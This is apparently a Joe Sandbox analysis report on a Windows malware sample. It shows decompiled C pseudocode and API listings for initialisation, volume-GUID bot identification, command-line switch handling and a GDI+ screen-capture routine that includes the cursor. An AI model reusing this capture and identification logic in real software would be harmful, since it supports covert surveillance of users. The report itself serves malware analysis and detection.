
Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: 6c12d6bd9a0efa3d5fc5441ef8094d7353afce18cdfa11d9a985a09d71f4b91d
Instruction ID: 359ed33d43641c81379ca555c646439d2c4cd37488da8c01ba088063675b71a3
Opcode Fuzzy Hash: 6c12d6bd9a0efa3d5fc5441ef8094d7353afce18cdfa11d9a985a09d71f4b91d
Instruction Fuzzy Hash: 92111C71A00209BBEB219F959E85BEFBBBCEF00744F10417AF551F11A0EB759A409A58

Uniqueness

Uniqueness Score: -1.00%

Function 00419B3D Relevance: 10.6, APIs: 7, Instructions: 119
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00419B3D(signed int __ecx, void* __edx, void* __edi) {
				char _v741;
				char _v796;
				signed int _v800;
				char _v804;
				signed char _v808;
				intOrPtr _v816;
				void* __esi;
				void* _t14;
				signed int _t17;
				signed int _t18;
				void** _t19;
				signed int _t23;
				int _t25;
				signed int _t26;
				signed int _t28;
				void* _t34;
				int _t37;
				void* _t40;
				void* _t41;
				signed int _t44;

				_t41 = __edi;
				_t40 = __edx;
				_t39 = __ecx;
				_t44 = __ecx & 0x00000001;
				_v800 = __ecx;
				_t37 = 0;
				if(_t44 == 0) {
					 *0x421868 = _t37;
				}
				if(E00419713(_t40, _t39) != 0) {
					_t14 = HeapCreate(_t37, 0x80000, _t37); // executed
					 *0x4211fc = _t14;
					__eflags = _t14 - _t37;
					if(_t14 != _t37) {
						 *0x4211f5 = 1;
					} else {
						 *0x4211fc = GetProcessHeap();
						 *0x4211f5 = _t37;
					}
					 *0x42042c = _t37;
					 *0x4211f4 = _t37;
					InitializeCriticalSection(0x420408);
					 *0x420420 = _t37; // executed
					__imp__#115(0x202,  &_v796); // executed
					_t17 = E00419838(_v808, _t39, _t41, _t44);
					__eflags = _t17;
					if(_t17 == 0) {
						goto L3;
					} else {
						__eflags = _t44 - _t37;
						if(_t44 != _t37) {
							L10:
							_t19 = E00409CB0(_t39, 0xffffffff, 0x421878);
							 *0x42186c = _t19;
							__eflags = _t19 - _t37;
							if(_t19 == _t37) {
								goto L3;
							} else {
								 *0x421870 = GetLengthSid( *_t19);
								 *0x421874 = E00409B31( *( *0x42186c), _t20);
								_t23 = E004198B7(_t22, _v816);
								__eflags = _t23;
								if(_t23 == 0) {
									goto L3;
								} else {
									 *0x421ad8 = GetCurrentProcessId();
									 *0x421adc = _t37;
									__eflags = _t44 - _t37;
									if(_t44 != _t37) {
										_t25 = 1;
									} else {
										_t25 = E00419919();
									}
									__eflags = _t25 - _t37;
									if(_t25 == _t37) {
										goto L3;
									} else {
										__eflags = _t44 - _t37;
										if(_t44 == _t37) {
											E0041A05C( &_v804);
											_t39 = 0x421cd6;
											E0040CD2B(0x421cd6, 0x421ae0,  *0x421874,  &_v741, _t37);
										}
										_t26 = E0041996B(_v808);
										__eflags = _t26;
										if(_t26 == 0) {
											goto L3;
										} else {
											__eflags = _v808 & 0x00000002;
											 *0x42120c = _t37;
											 *0x421258 = 0;
											 *0x421d38 = 0;
											 *0x421e40 = 0;
											 *0x421dd8 = 0;
											 *0x4216e8 = 0;
											 *0x421680 = 0;
											if(__eflags == 0) {
												_t28 = 1;
											} else {
												_t28 = E00419A22(_t39, _t40, __eflags);
											}
											__eflags = _t28 - _t37;
											_t12 = _t28 != _t37;
											__eflags = _t12;
											_t18 = _t28 & 0xffffff00 | _t12;
										}
									}
								}
							}
						} else {
							_t34 = CreateEventW(0x4218a0, 1, _t37, _t37);
							 *0x421d30 =  *0x421d30 | 0xffffffff;
							 *0x421d2c = _t34;
							__eflags = _t34 - _t37;
							if(_t34 == _t37) {
								goto L3;
							} else {
								goto L10;
							}
						}
					}
				} else {
					L3:
					_t18 = 0;
				}
				return _t18;
			}

0x00419b3d
0x00419b3d
0x00419b3d
0x00419b4d
0x00419b52
0x00419b56
0x00419b57
0x00419b59
0x00419b59
0x00419b67
0x00419b77
0x00419b7d
0x00419b82
0x00419b84
0x00419b99
0x00419b86
0x00419b8c
0x00419b91
0x00419b91
0x00419ba5
0x00419bab
0x00419bb1
0x00419bc1
0x00419bc7
0x00419bd1
0x00419bd6
0x00419bd8
0x00000000
0x00419bda
0x00419bda
0x00419bdc
0x00419c01
0x00419c08
0x00419c0d
0x00419c12
0x00419c14
0x00000000
0x00419c1a
0x00419c22
0x00419c38
0x00419c3d
0x00419c42
0x00419c44
0x00000000
0x00419c4a
0x00419c50
0x00419c55
0x00419c5b
0x00419c5d
0x00419c66
0x00419c5f
0x00419c5f
0x00419c5f
0x00419c68
0x00419c6a
0x00000000
0x00419c70
0x00419c70
0x00419c72
0x00419c78
0x00419c89
0x00419c98
0x00419c98
0x00419ca1
0x00419ca6
0x00419ca8
0x00000000
0x00419cae
0x00419cb0
0x00419cb5
0x00419cbb
0x00419cc1
0x00419cc7
0x00419ccd
0x00419cd3
0x00419cd9
0x00419cdf
0x00419ce8
0x00419ce1
0x00419ce1
0x00419ce1
0x00419cea
0x00419cec
0x00419cec
0x00419cec
0x00419cec
0x00419ca8
0x00419c6a
0x00419c44
0x00419bde
0x00419be7
0x00419bed
0x00419bf4
0x00419bf9
0x00419bfb
0x00000000
0x00000000
0x00000000
0x00000000
0x00419bfb
0x00419bdc
0x00419b69
0x00419b69
0x00419b69
0x00419b69
0x00419cf4

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 00419B77
GetProcessHeap.KERNEL32 ref: 00419B86
InitializeCriticalSection.KERNEL32(00420408), ref: 00419BB1
WSAStartup.WS2_32(00000202,?), ref: 00419BC7
CreateEventW.KERNEL32(004218A0,00000001,00000000,00000000), ref: 00419BE7
GetLengthSid.ADVAPI32(00000000,000000FF,00421878), ref: 00419C1C
GetCurrentProcessId.KERNEL32(?,00000000), ref: 00419C4A

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CreateHeapProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID:
API String ID: 1105113389-0
Opcode ID: d6d7bbcf56f70bfe1ceffd341064f476b74cbc990693508b2b69d31e41c4ed53
Instruction ID: 3ee49a0235ed53288fecde5618098c8842ac454befbea5bcbf62aa48bd3f5f12
Opcode Fuzzy Hash: d6d7bbcf56f70bfe1ceffd341064f476b74cbc990693508b2b69d31e41c4ed53
Instruction Fuzzy Hash: 1A41F2746143449FC720BF61AC91AA63BD8FB25308B80463FE551932B1D7795C868B1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC7A Relevance: 10.6, APIs: 7, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0040CC7A() {
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t37;
				void* _t40;
				void* _t42;

				_t40 = _t42 - 0x74;
				_t31 = 0; // executed
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t40 - 0x25c, _t34, _t37, _t30); // executed
				if(0 != 0) {
					L8:
					E00408730( *((intOrPtr*)(_t40 + 0x7c)), 0x10);
				} else {
					PathAddBackslashW(_t40 - 0x25c);
					_t36 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t21 =  *_t36(_t40 - 0x25c, _t40 - 0x54, 0x64); // executed
						if(_t21 != 0) {
							break;
						}
						PathRemoveBackslashW(_t40 - 0x25c);
						if(PathRemoveFileSpecW(_t40 - 0x25c) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t40 - 0x25c);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t40 - 0x40)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t40 + 0xc)) = 0;
						_t29 = _t40 - 0x40;
						__imp__CLSIDFromString(_t29,  *((intOrPtr*)(_t40 + 0x7c)));
						if(_t29 != 0) {
							goto L8;
						} else {
							_t31 = 1;
						}
					}
				}
				L9:
				return _t31;
			}

0x0040cc7b
0x0040cc96
0x0040cc98
0x0040cca0
0x0040cd15
0x0040cd1a
0x0040cca2
0x0040ccaf
0x0040ccb1
0x0040cce0
0x0040cced
0x0040ccf1
0x00000000
0x00000000
0x0040ccc0
0x0040ccd5
0x00000000
0x0040ccd7
0x0040ccde
0x00000000
0x0040ccde
0x00000000
0x0040ccd5
0x0040ccf8
0x00000000
0x0040ccfa
0x0040ccff
0x0040cd03
0x0040cd07
0x0040cd0f
0x00000000
0x0040cd11
0x0040cd11
0x0040cd11
0x0040cd0f
0x0040ccf8
0x0040cd1f
0x0040cd28

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,?), ref: 0040CC98
PathAddBackslashW.SHLWAPI(?,?,?,?), ref: 0040CCAF
PathRemoveBackslashW.SHLWAPI(?,?,?,?), ref: 0040CCC0
PathRemoveFileSpecW.SHLWAPI(?,?,?,?), ref: 0040CCCD
PathAddBackslashW.SHLWAPI(?,?,?,?), ref: 0040CCDE
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064,?,?,?), ref: 0040CCED
CLSIDFromString.OLE32(?,?,?,?,?), ref: 0040CD07

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 0bea37bcbc7b012c63bd9e7b813e863e4c16b3eed9c536081ae2ef526acea39b
Instruction ID: 0b9640babf1e54782d4c9eca5703c4749f96dd45a8dbca2e53324de6e6111d9b
Opcode Fuzzy Hash: 0bea37bcbc7b012c63bd9e7b813e863e4c16b3eed9c536081ae2ef526acea39b
Instruction Fuzzy Hash: 36112171500219AEDB209BB0DD48EDB77BCAF84345F204577E915F7160F738DA488B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041A920 Relevance: 9.1, APIs: 6, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A920(void* __edx, void* __edi, void* __eflags) {
				char _v0;
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t24;
				char* _t27;
				void* _t31;
				signed int _t32;
				signed int _t37;
				char _t38;
				signed int _t41;

				_t39 = 0;
				_t37 = 0; // executed
				_t24 = E00419B3D(0, __edx, __edi); // executed
				if(_t24 == 0) {
					L26:
					__eflags = _t37;
					_t23 = _t37 == 0;
					__eflags = _t23;
					ExitProcess(0 | _t23);
				} else {
					_t27 =  &_v0;
					_t45 =  *((intOrPtr*)(_t27 + 4));
					if( *((intOrPtr*)(_t27 + 4)) != 0) {
						E0041A3E2(_t45, 1);
					}
					_v20 = 0;
					_v16 = 1;
					_v5 = 0;
					_t38 = 0;
					SetErrorMode(0x8007);
					_t31 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
					if(_t31 == 0) {
						L21:
						_t32 = E0041A5E9(_t39, __eflags, _v20, _v16);
						L22:
						_t37 = _t32;
						L23:
						if(_t37 == 0 || ( *0x421868 & 0x00000002) == 0) {
							goto L26;
						} else {
							Sleep(0xffffffff);
							return _t32;
						}
					}
					_t41 = 0;
					if(_v12 <= 0) {
						L16:
						LocalFree(_t31);
						_t55 = _t38;
						if(_t38 == 0) {
							__eflags = _v5;
							if(__eflags == 0) {
								goto L21;
							}
							E0041B7D4(_t41);
							_t32 = E00416770();
							__eflags =  *0x421868 & 0x00000004;
							_t37 = _t32;
							if(( *0x421868 & 0x00000004) != 0) {
								_t32 = E0041B60D(0x421ea8, 0);
							}
							goto L23;
						}
						_t32 = E0041A3E2(_t55, 0);
						goto L22;
					} else {
						goto L5;
					}
					do {
						L5:
						_t39 =  *(_t31 + _t41 * 4);
						if(_t39 != 0 &&  *_t39 == 0x2d) {
							_t39 =  *(_t39 + 2) & 0x0000ffff;
							if(_t39 == 0x66) {
								_v20 = 1;
							} else {
								if(_t39 == 0x69) {
									_t38 = 1;
								} else {
									if(_t39 == 0x6e) {
										_v16 = 0;
									} else {
										if(_t39 == 0x76) {
											_v5 = 1;
										}
									}
								}
							}
						}
						_t41 = _t41 + 1;
					} while (_t41 < _v12);
					goto L16;
				}
			}

0x0041a927
0x0041a929
0x0041a92b
0x0041a932
0x0041aa22
0x0041aa24
0x0041aa26
0x0041aa26
0x0041aa2a
0x0041a938
0x0041a938
0x0041a93b
0x0041a93f
0x0041a943
0x0041a943
0x0041a94d
0x0041a951
0x0041a955
0x0041a959
0x0041a95b
0x0041a96c
0x0041a974
0x0041a9fd
0x0041aa03
0x0041aa08
0x0041aa08
0x0041aa0a
0x0041aa0c
0x00000000
0x0041aa17
0x0041aa19
0x0041aa21
0x0041aa21
0x0041aa0c
0x0041a97a
0x0041a97f
0x0041a9c0
0x0041a9c1
0x0041a9c7
0x0041a9c9
0x0041a9d4
0x0041a9d8
0x00000000
0x00000000
0x0041a9da
0x0041a9df
0x0041a9e4
0x0041a9eb
0x0041a9ed
0x0041a9f6
0x0041a9f6
0x00000000
0x0041a9ed
0x0041a9cd
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a981
0x0041a981
0x0041a981
0x0041a986
0x0041a98e
0x0041a995
0x0041a9b6
0x0041a997
0x0041a99a
0x0041a9b2
0x0041a99c
0x0041a99f
0x0041a9ac
0x0041a9a1
0x0041a9a4
0x0041a9a6
0x0041a9a6
0x0041a9a4
0x0041a99f
0x0041a99a
0x0041a995
0x0041a9ba
0x0041a9bb
0x00000000
0x0041a981

APIs

SetErrorMode.KERNEL32(00008007), ref: 0041A95B
GetCommandLineW.KERNEL32(00000000), ref: 0041A965
CommandLineToArgvW.SHELL32(00000000), ref: 0041A96C
LocalFree.KERNEL32(00000000), ref: 0041A9C1
Sleep.KERNEL32(000000FF), ref: 0041AA19

Part of subcall function 0041A3E2: GetModuleHandleW.KERNEL32(?), ref: 0041A3F9

Part of subcall function 0041B7D4: GetCurrentThreadId.KERNEL32 ref: 0041B7E1
Part of subcall function 0041B7D4: GetThreadDesktop.USER32(00000000), ref: 0041B7E8
Part of subcall function 0041B7D4: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0041B801

Part of subcall function 00416770: GetCurrentThread.KERNEL32 ref: 0041677D
Part of subcall function 00416770: SetThreadPriority.KERNEL32(00000000), ref: 00416784
Part of subcall function 00416770: SetEvent.KERNEL32 ref: 00416796
Part of subcall function 00416770: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 004167F0

Part of subcall function 0041B60D: DeleteObject.GDI32(?), ref: 0041B620
Part of subcall function 0041B60D: CloseHandle.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B630
Part of subcall function 0041B60D: TlsFree.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B63B
Part of subcall function 0041B60D: CloseHandle.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B649
Part of subcall function 0041B60D: UnmapViewOfFile.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B653
Part of subcall function 0041B60D: CloseHandle.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B660
Part of subcall function 0041B60D: SelectObject.GDI32(?,?), ref: 0041B67A
Part of subcall function 0041B60D: DeleteObject.GDI32(?), ref: 0041B68B
Part of subcall function 0041B60D: DeleteDC.GDI32(?), ref: 0041B698
Part of subcall function 0041B60D: CloseHandle.KERNEL32(?,00000000), ref: 0041B6A9
Part of subcall function 0041B60D: WaitForSingleObject.KERNEL32(?,00000000,00000000), ref: 0041B6B8
Part of subcall function 0041B60D: PostThreadMessageW.USER32 ref: 0041B6D1

ExitProcess.KERNEL32 ref: 0041AA2A

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: HandleObjectThread$Close$Delete$CommandCurrentFreeLineMessage$ArgvDesktopErrorEventExitFileInformationLocalModeModulePostPriorityProcessSelectSingleSleepUnmapUserViewWait
String ID:
API String ID: 1127662250-0
Opcode ID: 845b4e92e24d690f083b17c88fa1cc86f1bc7568deb856caec1ccbdb9172e0bc
Instruction ID: e2061beeadf6432ce862a0f629a3e392fa82db0bc889b7317c2b08432f575009
Opcode Fuzzy Hash: 845b4e92e24d690f083b17c88fa1cc86f1bc7568deb856caec1ccbdb9172e0bc
Instruction Fuzzy Hash: 6931C070A162449ACF1497B4C9587EE3BA0AF12309F18845BE0425A2E2C37D48EDC70F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406765 Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 393
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E00406765(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				int _t239;
				void* _t246;
				int _t251;
				unsigned int _t256;
				intOrPtr* _t258;
				signed short _t259;
				intOrPtr _t260;
				WCHAR** _t261;
				intOrPtr _t264;
				signed int _t265;
				signed int _t268;
				void* _t271;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L74:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L74;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t258 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t258 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L74;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L74;
						}
						_t264 =  *_t258(L"DISPLAY", 0, 0, 0);
						_v24 = _t264;
						if(_t264 == 0) {
							L73:
							_v80(_v116);
							goto L74;
						}
						_t197 = _v12(_t264);
						_v36 = _t197;
						if(_t197 == 0) {
							L72:
							_v68(_v24);
							goto L73;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t259 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t259 = _a12;
								L26:
								if(_t259 == 0) {
									_t200 = _v28(_t264, 8);
									_t265 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t265 = _t259 & 0x0000ffff;
									_a12 = _t265;
								}
								_t202 = _v44(_v24, _t265, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L71:
									_v68(_v36);
									goto L72;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L70:
										_v84(_v44);
										goto L71;
									}
									_t206 = 0;
									_t246 = 0;
									if(_t259 != 0) {
										_t256 = (_t259 & 0x0000ffff) >> 1;
										_t206 = _v52.x - _t256;
										if(_t206 < 0) {
											_t206 = 0;
										}
										_t246 = _v52.y - _t256;
										if(_t246 < 0) {
											_t246 = 0;
										}
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t246;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t246);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t265);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L69:
										_v56(_v36, _v112);
										goto L70;
									} else {
										if(_v12 != 0) {
											_t251 = _v52.x - _v172.xHotspot;
											if(_t251 < 0) {
												_t251 = 0;
											}
											_t239 = _v52.y - _v172.yHotspot;
											if(_t239 < 0) {
												_t239 = 0;
											}
											DrawIcon(_v36, _t251, _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L69;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L68:
												_v72(_v12);
												goto L69;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L68;
											} else {
												_t260 = E0040865F(_t215);
												_v40 = _t260;
												if(_t260 == 0) {
													goto L68;
												}
												_push(_t260);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L60:
													E0040868F(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E004086CB( &_v148, 0x403080, 0x10);
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L68;
												}
												_t268 = 0;
												if(_a12 <= 0) {
													goto L60;
												}
												_t261 = _t260 + 0x30;
												while(lstrcmpiW(_a4,  *_t261) != 0) {
													_t268 = _t268 + 1;
													_t261 =  &(_t261[0x13]);
													if(_t268 < _a12) {
														continue;
													}
													goto L60;
												}
												E004086CB( &_v188, _t268 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L60;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678e
0x00406791
0x00406794
0x00406797
0x004067a5
0x004067b2
0x004067bf
0x004067cc
0x004067d9
0x004067e6
0x004067f3
0x004067f6
0x004067f8
0x004067fe
0x00406be6
0x00406bef
0x00406bf4
0x00406bf4
0x00406bf9
0x00406bfe
0x00406bfe
0x00406c03
0x00406c08
0x00406c08
0x00406c11
0x00406839
0x0040683e
0x00406846
0x00406849
0x0040684b
0x00406850
0x00000000
0x00000000
0x0040685b
0x00406863
0x00406870
0x0040687c
0x00406889
0x00406896
0x004068a3
0x004068b0
0x004068bd
0x004068c0
0x004068c2
0x004068c7
0x00000000
0x0040690b
0x0040690b
0x0040690f
0x00406913
0x00406914
0x0040691b
0x0040691e
0x00406921
0x00406929
0x00000000
0x00000000
0x00406939
0x0040693b
0x00406940
0x00406be0
0x00406be3
0x00000000
0x00406be3
0x00406947
0x0040694a
0x0040694f
0x00406bda
0x00406bdd
0x00000000
0x00406bdd
0x00406964
0x0040696a
0x0040696f
0x00406999
0x00406999
0x00000000
0x00406971
0x00406981
0x00406991
0x00406991
0x00406997
0x0040699d
0x004069a0
0x004069a3
0x004069b0
0x004069b8
0x004069bd
0x004069a5
0x004069a5
0x004069a8
0x004069a8
0x004069c7
0x004069ca
0x004069cf
0x00406bd4
0x00406bd7
0x00000000
0x004069d5
0x004069d9
0x004069dc
0x004069e1
0x00406bce
0x00406bd1
0x00000000
0x00406bd1
0x004069e7
0x004069e9
0x004069ee
0x004069f6
0x004069f8
0x004069fa
0x004069fc
0x004069fc
0x00406a01
0x00406a03
0x00406a05
0x00406a05
0x00406a07
0x00406a07
0x00406a0a
0x00406a0c
0x00406a0c
0x00406a0f
0x00406a0f
0x00406a12
0x00406a14
0x00406a14
0x00406a12
0x00406a17
0x00406a1c
0x00406a1d
0x00406a1e
0x00406a21
0x00406a24
0x00406a25
0x00406a26
0x00406a27
0x00406a2f
0x00406bc5
0x00406bcb
0x00000000
0x00406a35
0x00406a38
0x00406a3d
0x00406a43
0x00406a45
0x00406a45
0x00406a4a
0x00406a50
0x00406a52
0x00406a52
0x00406a5c
0x00406a5c
0x00406a65
0x00406a66
0x00406a67
0x00406a6a
0x00406a72
0x00000000
0x00406a81
0x00406a84
0x00406a88
0x00406a89
0x00406a8c
0x00406a94
0x00406bbf
0x00406bc2
0x00000000
0x00406bc2
0x00406a9a
0x00406a9f
0x00000000
0x00406aae
0x00406ab3
0x00406ab5
0x00406aba
0x00000000
0x00000000
0x00406ac0
0x00406ac1
0x00406ac4
0x00406acc
0x00406b0a
0x00406b0d
0x00406b15
0x00406b1e
0x00406b22
0x00406b23
0x00406b29
0x00406b38
0x00406b41
0x00406b51
0x00406b5f
0x00406b70
0x00406b80
0x00406b84
0x00406b84
0x00406b9e
0x00406ba3
0x00406ba6
0x00406bbc
0x00406ba8
0x00406bab
0x00406bae
0x00406bae
0x00406ba6
0x00406b29
0x00000000
0x00406b15
0x00406ace
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406ae7
0x00406ae8
0x00406aee
0x00000000
0x00000000
0x00000000
0x00406af0
0x00406b02
0x00406b07
0x00000000
0x00406b07
0x00406a9f
0x00406a72
0x00406a2f
0x004069cf
0x00000000
0x00406997
0x0040696f
0x004068c7

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00406797
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004067A8
GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 004067B5
GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 004067C2
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 004067CF
GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 004067DC
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 004067E9
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 004067F6
LoadLibraryA.KERNEL32(ole32.dll), ref: 0040683E
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 00406849
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040685B
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 00406866
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00406872
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040687F
